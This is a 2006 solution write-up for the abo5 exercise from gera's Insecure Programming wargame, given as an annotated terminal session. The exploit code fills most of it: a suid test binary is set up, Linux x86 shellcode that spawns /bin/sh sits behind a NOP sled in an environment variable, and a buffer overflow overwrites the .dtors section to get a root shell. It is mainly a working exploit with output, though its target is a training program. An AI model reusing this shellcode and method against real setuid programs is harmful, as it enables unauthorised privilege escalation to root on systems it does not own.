/
| [exp-abo5.txt] Wed Mar 29 21:34:09 CEST 2006
|
| abo5.c exploit - solution 1
| http://community.core-sdi.com/~gera/InsecureProgramming/abo5.c
|
| Copyright: bunker - http://rawlab.altervista.org
| 37F1 A7A1 BB94 89DB A920  3105 9F74 7349 AF4C BFA2
\


/
| Suid abo5 (testing) 
\
bunker@syn:~/abo5$ su
 Password:
 root@syn:/home/bunker/abo5# chown root.root abo5
 root@syn:/home/bunker/abo5# chmod +s abo5
 root@syn:/home/bunker/abo5# exit
  exit

/
| Put shellcode in file "s_code"
\
bunker@syn:~/abo5$ perl -e 'print "\x6a\x46\x58\x31\xdb\x31\xc9\xcd\x80
\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52
\x53\x89\xe1\xcd\x80"' > s_code

/
| Export SCODE env with NOPx100 + scode
\
bunker@syn:~/abo5$ export SCODE=`perl -e 'print "\x90"x100'``cat s_code`

/
| Find $SCODE address (see exp-abo3.txt for getenvaddr.c)
\
bunker@syn:~/abo1$ ./getenvaddr SCODE
 SCODE is located at 0xbffff441

/
| Get address of .dtor section
\
bunker@syn:~/abo5$ objdump -s -j .dtors abo5
 Contents of section .dtors:
  80495e0 ffffffff 00000000                    ........

bunker@syn:~/abo5$ nm -a abo5 | grep DTOR
 080495e4 d __DTOR_END__
 080495e0 d __DTOR_LIST__

/
| Executes abo5, using buffer overflow to overwrite the value of *pbuf 
| with address of .dtor section, then write in .dtor the address of 
| shellcode through *pbuf.
\
bunker@syn:~/abo5$ ./abo5 `perl -e 'print "\xe4\x95\x04\x08"x68'` `perl -
e 'print "\x51\xf4\xff\xbf"'`
 sh-3.1# id
 uid=0(root) gid=100(users) groups=17(audio),18(video),19(cdrom),100(users)

/
| Boom! :D
\